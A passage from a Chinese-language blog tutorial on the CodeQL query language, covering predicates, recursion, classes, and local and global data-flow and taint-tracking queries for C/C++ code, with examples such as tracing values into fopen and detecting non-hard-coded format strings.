</span>&#123;</span><br><span class="line">  <span class="comment">// i是一个数据集合，此时该集合可能是**无限大小**</span></span><br><span class="line">  <span class="comment">// result集合被设置为i*4，意味着result集合的大小有可能也是**无限大小**</span></span><br><span class="line">  result = i * <span class="number">4</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但如果我们仍然需要定义这类函数，则必须<strong>限制集合数据大小</strong>，同时添加一个<code>bindingset</code>标注。该标注将会声明谓词<code>plusOne</code>所包含的数据集合是有限的，前提是<code>i</code>绑定到有限数量的数据集合。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">bindingset[x] bindingset[y]</span><br><span class="line"><span class="function">predicate <span class="title">plusOne</span><span class="params">(<span class="type">int</span> x, <span class="type">int</span> y)</span> </span>&#123;</span><br><span class="line">  x + <span class="number">1</span> = y</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from <span class="type">int</span> x, <span class="type">int</span> y</span><br><span class="line">where y = <span class="number">42</span> <span class="keyword">and</span> <span class="built_in">plusOne</span>(x, y)</span><br><span class="line">select x, y</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-递归">d. 递归</h4><ul><li><p>谓词类似于函数，可以<strong>递归调用</strong>。</p><p>同时<code>result</code>变量可以按照任何方式来表达与其他变量之间的关系，因此<code>result</code>变量的赋值不局限于使用<code>=</code>符号。</p><p>以下是一个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="built_in">getANeighbor</span>(result)</span><br><span class="line">&#125;</span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;Austria&quot;</span>)</span><br><span class="line"><span class="comment">// 输出Germany</span></span><br></pre></td></tr></table></figure></li><li><p>传递闭包</p><blockquote><p>谓词的传递闭包是递归谓词，它的结果是通过重复应用原始的谓词来获得的。</p><p>特别要注意的是，原始谓词必须有两个参数(可能包括this或result值)，并且这些参数必须具有兼容的类型。</p><p>由于传递闭包是递归的一种常见形式，因此QL有两个有用的缩写，分别是<code>+</code>和<code>*</code></p></blockquote><ul><li><p><strong>传递闭包(+)</strong></p><p>如果要一次或多次的应用特定谓词，请在谓词后添加一个<code>+</code>符号。</p><p>举个例子，假设定义了一个带有成员谓词<code>getAParent()</code>的<code>Person</code>类，其中<code>p.getAParent()</code>会返回p的所有父母。而<code>p.getAParent+()</code>将会返回p的父母、p的父母的父母、等等等等。</p><p>使用<code>+</code>来表示通常会比显式定义递归谓词更简单，<code>p.getAParent+()</code>等价于以下递归谓词：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>()</span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>自反传递闭包(*)</strong></p><p>这个类似于上面的传递闭包。与之前所不同的是，使用<code>*</code>可以让谓词调用自己一次至多次。</p><p>例如：<code>p.getAParent*()</code>将会输出p的祖先，或者p。该谓词调用等价于以下谓词:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor2</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/predicates.html">Predicates - QL language reference</a></p></blockquote><h3 id="2-类">2. 类</h3><ul><li><p>以上面ql中的各种类为例（例如Function类），这些类的设计将特定一类的代码归结为一处，以便于后续查询的使用。而如果我们需要自定义特定的类，那该怎么做呢？</p><blockquote><p>CodeQL中的类，<strong>并不意味着建立一个新的对象</strong>，而只是表示特定一类的数据集合，请注意区分。</p></blockquote></li><li><p>定义一个类，需要三个步骤</p><ul><li><p>使用关键字<code>class</code></p></li><li><p>起一个类名，其中类名必须是首字母大写的。</p></li><li><p>确定是从哪个类中派生出来的</p><blockquote><p>使用的基类，除了cpp包中定义的各种类以外，还包括基本类型，即<code>boolean</code>、<code>float</code>、<code>int</code>、<code>string</code>以及<code>date</code>。</p></blockquote></li><li><p>类的主体</p></li></ul></li><li><p>以下是一个简单的例子，这个例子是官方的一个样例。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> in [<span class="number">1</span> .. <span class="number">2</span>] <span class="comment">// </span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from OneTwoThree i </span><br><span class="line">where i = <span class="number">1</span> <span class="keyword">or</span> i.<span class="built_in">getAString</span>() = <span class="string">&quot;One, two or three: 2&quot;</span></span><br><span class="line">select i</span><br><span class="line"><span class="comment">// 输出1和2</span></span><br></pre></td></tr></table></figure><ul><li><p><strong>特征谓词</strong>类似于C++中的类构造函数，它将会进一步限制当前类所表示数据的集合。例如上面的特征谓词</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">  <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>它将数据集合从原先的<code>Int</code>集，进一步限制至1-3这个范围。</p><p><code>this</code>变量表示的是当前类中所包含的数据集合。与<code>result</code>变量类似，<code>this</code>同样是用于表示数据集合直接的关系。</p></li><li><p>在特征谓词中，比较常用的一个关键字是<a href="https://help.semmle.com/QL/ql-handbook/formulas.html#exists">exists</a>。该关键字的语法如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula&gt;)</span><br><span class="line"><span class="comment">// 以下两个exists所表达的意思等价。</span></span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; | &lt;formula <span class="number">2</span>&gt;</span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; <span class="keyword">and</span> &lt;formula <span class="number">2</span>&gt;</span><br></pre></td></tr></table></figure><p>这个关键字的使用引入了一些新的变量。如果变量中至少有一组值可以使formula成立，那么该值将被保留。</p><p>一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 对于MacroInvocation这个大类的数据集合来说，</span></span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            <span class="comment">// 如果存在宏调用，其宏名称满足特定正则表达式</span></span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="comment">// 将这类数据保存至当前类中</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>与之对应的还有成员谓词，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> in [<span class="number">1</span> .. <span class="number">2</span>]</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">select <span class="number">1.</span>(OneTwoThree).<span class="built_in">getAString</span>() <span class="comment">// 输出&quot;One, two or three: 1&quot;</span></span><br><span class="line"><span class="comment">//select 4.(OneTwoThree).getAString() // 无输出</span></span><br></pre></td></tr></table></figure><p>其中，<code>1.(OneTwoThree).getAString()</code>会将<code>int</code>类型的1转换为<code>OneTwoThree</code>类型。<strong>在转换的过程中会丢弃不满足<code>OneTwoThree</code>类中限定条件的数据</strong>。因此<code>4.(OneTwoThree).getAString()</code>将不会输出任何信息，因为整数4在转换的过程中被丢弃了。</p></li></ul></li><li><p>与C++类似，CodeQL中类里可以声明一个类字段，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SmallInt</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">SmallInt</span>() &#123; <span class="keyword">this</span> = [<span class="number">1</span> .. <span class="number">10</span>] &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> DivisibleInt extends SmallInt &#123;</span><br><span class="line">  SmallInt divisor;   <span class="comment">// declaration of the field `divisor`</span></span><br><span class="line">  <span class="built_in">DivisibleInt</span>() &#123; <span class="keyword">this</span> % divisor = <span class="number">0</span> &#125;</span><br><span class="line"></span><br><span class="line">  SmallInt <span class="built_in">getADivisor</span>() &#123; result = divisor &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DivisibleInt i</span><br><span class="line">select i, i.<span class="built_in">getADivisor</span>()</span><br></pre></td></tr></table></figure></li><li><p>需要注意的是，</p><ul><li><p>每个类都不能继承自己</p></li><li><p>不能继承final类</p></li><li><p>不能继承不相容的类</p><blockquote><p>这一点需要额外说明一下，从某个基类派生出的类，将拥有基类的所有数据集合范围。如果某个类继承了多个基类，那么<strong>该类内含的数据集合，将是两个基类数据集合的交集</strong>。</p></blockquote></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/types.html#classes">class - QL language reference</a></p></blockquote><h2 id="六、数据流分析与污点追踪">六、数据流分析与污点追踪</h2><blockquote><p>该部分内容主要 <s>参考</s> 翻译自：<a href="https://codeql.github.com/docs/codeql-language-guides/analyzing-data-flow-in-cpp/">Analyzing data flow in C and C++ - CodeQL documentation</a></p><p>参考了<a href="https://codeql.github.com/docs/writing-codeql-queries/about-data-flow-analysis/#about-data-flow-analysis">About data flow analysis</a>的部分内容</p></blockquote><ul><li>我们可以在CodeQL中，使用数据流分析来跟踪可能导致漏洞的潜在恶意数据流。</li><li>数据流分析可以分析出变量在程序中各节点上可能的值，并确定这些值如何在程序中传输以及使用方式。</li><li><strong>数据流</strong>分为两个部分：<strong>局部数据流</strong>以及<strong>全局数据流</strong></li></ul><h3 id="1-局部数据流">1. 局部数据流</h3><p><strong>局部数据流</strong>指的是在一个单独函数内的数据流。局部数据流比全局数据流分析的更加简单、迅速，同时也更加精确。</p><h4 id="a-使用局部数据流">a. 使用局部数据流</h4><ul><li><p>局部数据流的库函数主要位于<code>DataFlow</code>模块中。该模块定义了一个类<code>Class</code>，这个类用于表示数据可以流经的任何元素。</p></li><li><p>而<code>Node</code>类分为两种，分别是表达式节点<code>ExprNode</code>与参数节点<code>ParameterNode</code>。我们可以使用谓词<code>asExpr</code>与<code>asParameter</code>，将数据流结点与表达式节点/参数结点之间进行映射。</p><blockquote><p>注意：参数结点<code>ParameterNode</code>指的是<strong>当前函数参数</strong>的数据流结点。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Node</span> &#123;</span><br><span class="line">  <span class="comment">/** Gets the expression corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Expr <span class="title">asExpr</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/** Gets the parameter corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Parameter <span class="title">asParameter</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>或者使用谓词<code>exprNode</code>以及<code>parameterNode</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to expression `e`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ExprNode <span class="title">exprNode</span><span class="params">(Expr e)</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to the value of parameter `p` at function entry.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ParameterNode <span class="title">parameterNode</span><span class="params">(Parameter p)</span> </span>&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>谓词<code>localFlowStep(Node nodeFrom, Node nodeTo)</code>可以分析出从<code>nodeFrom</code>到<code>nodeTo</code>中的元素之间数据流动的方式。该谓词可以通过使用符号<code>+</code>和<code>*</code>来进行递归调用，或者使用预定义好的递归谓词<code>localFlow</code>。</p><p>以下是一个用于查找从参数<code>source</code>到表达式<code>sink</code>的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-使用局部污点追踪">b. 使用局部污点追踪</h4><ul><li><p>局部污点追踪通过包括非保留值的流程步骤来扩展了局部数据流，例如以下C++代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> i = <span class="built_in">tainted_user_input</span>();</span><br><span class="line">some_big_struct *array = <span class="built_in">malloc</span>(i * <span class="built_in">sizeof</span>(some_big_struct));</span><br></pre></td></tr></table></figure><p>由于输出的变量<code>i</code>被污染，因此使用变量<code>i</code>的<code>malloc</code>函数参数也被污染。</p></li><li><p>局部污点追踪的库函数主要位于<code>TaintTracking</code>模块中。与局部数据流分析类似，污点追踪同样有谓词<code>localTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo)</code>用于污点分析，同样有递归版本的<code>localTaint</code>谓词。</p><p>一个简单的例子，查找从参数<code>source</code>到表达式<code>sink</code>的污点传播。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TaintTracking::<span class="built_in">localTaint</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-例子">c. 例子</h4><ul><li><p>这个例子是用于查找传入<code>fopen</code>函数的文件名称</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">select fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><p>但上面的ql代码只会将<strong>文件名参数</strong>的表达式输出，而这并不是可能传递给它的值。因此我们需要使用局部数据流分析来找到所有可流入该参数的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Expr src</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">exprNode</span>(src), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select src</span><br></pre></td></tr></table></figure><p>这样它将会输出可能流入<code>fopen</code>文件名参数的<strong>所有变量的表达式</strong>。</p><p>现在我们可以稍微将<code>source</code>改一下，将<code>exprNode</code>改成<code>parameterNode</code>，这样就可以查询出<strong>既是当前函数的参数，又可以作为<code>fopen</code>的文件名参数</strong>的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Parameter p</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(p), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select p</span><br></pre></td></tr></table></figure></li><li><p>以下这个例子将会查找<strong>格式字符串中没有被硬编码</strong>的格式化函数的调用。</p><blockquote><p>格式化函数包括但不限于各种<code>printf</code>函数。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.commons.Printf</span><br><span class="line"></span><br><span class="line">from FormattingFunction format, FunctionCall call, Expr formatString</span><br><span class="line">where call.<span class="built_in">getTarget</span>() = format</span><br><span class="line">  <span class="keyword">and</span> call.<span class="built_in">getArgument</span>(format.<span class="built_in">getFormatParameterIndex</span>()) = formatString</span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> <span class="built_in">exists</span>(DataFlow::Node source, DataFlow::Node sink |</span><br><span class="line">    DataFlow::<span class="built_in">localFlow</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">    source.<span class="built_in">asExpr</span>() instanceof StringLiteral <span class="keyword">and</span></span><br><span class="line">    sink.<span class="built_in">asExpr</span>() = formatString</span><br><span class="line">  )</span><br><span class="line">select call, <span class="string">&quot;Argument to &quot;</span> + format.<span class="built_in">getQualifiedName</span>() + <span class="string">&quot; isn&#x27;t hard-coded.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="2-全局数据流">2. 全局数据流</h3><p>全局数据流跟踪整个程序的数据流，因此比局部数据流更强大。但全局数据流的准确性不如本地数据流，并且通常需要更多的时间和内存来执行分析。</p><h4 id="a-使用全局数据流">a. 使用全局数据流</h4><p>通过继承<code>DataFlow::Configuration</code>类来使用全局数据流库。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyDataFlowConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyDataFlowConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyDataFlowConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>DataFlow::Configuration</code>类中定义了如下几个谓词：</p><ul><li><code>isSource</code>： <strong>定义数据可能从何处流出</strong></li><li><code>isSink</code>： <strong>定义数据可能流向的位置</strong></li><li><code>isBarrier</code>： 可选，限制数据流</li><li><code>isBarrierGuard</code>： 可选，限制数据流</li><li><code>isAdditionalFlowStep</code>： 可选，添加其他流程步骤</li></ul><p>在特征谓词<code>MyDataFlowConfiguration()</code>中定义了当前<code>Configuration</code>的名称，因此内部的<code>&quot;MyDataFlowConfiguration&quot;</code>需要替换成自己的名称。</p><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code>来执行全局数据流分析</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from MyDataFlowConfiguration dataflow, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where dataflow.<span class="built_in">hasFlow</span>(source, sink)</span><br><span class="line">select source, <span class="string">&quot;Data flow to $@.&quot;</span>, sink, sink.<span class="built_in">toString</span>()</span><br></pre></td></tr></table></figure><h4 id="b-使用全局污点追踪">b. 使用全局污点追踪</h4><p>与局部污点追踪类似，全局污点追踪针对的是全局数据流。全局污点追踪通过其他不保留值的步骤来扩展了全局数据流。</p><p>通过继承<code>TaintTracking::Configuration</code>类以使用全局污点追踪的库函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MyTaintTrackingConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyTaintTrackingConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyTaintTrackingConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在配置中定义了以下谓词：</p><ul><li><code>isSource</code>：定义污点可能从何处流出</li><li><code>isSink</code>：定义污点可能流入的地方</li><li><code>isSanitizer</code>：可选，限制污点流</li><li><code>isSanitizerGuard</code>：可选，限制污点流</li><li><code>isAdditionalTaintStep</code>：可选，添加其他污染步骤</li></ul><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code>以执行污点追踪分析。</p><h4 id="c-例子-2">c. 例子</h4><ul><li><p>以下数据流分析用于追踪<strong>从环境变量到打开文件</strong>的数据流</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 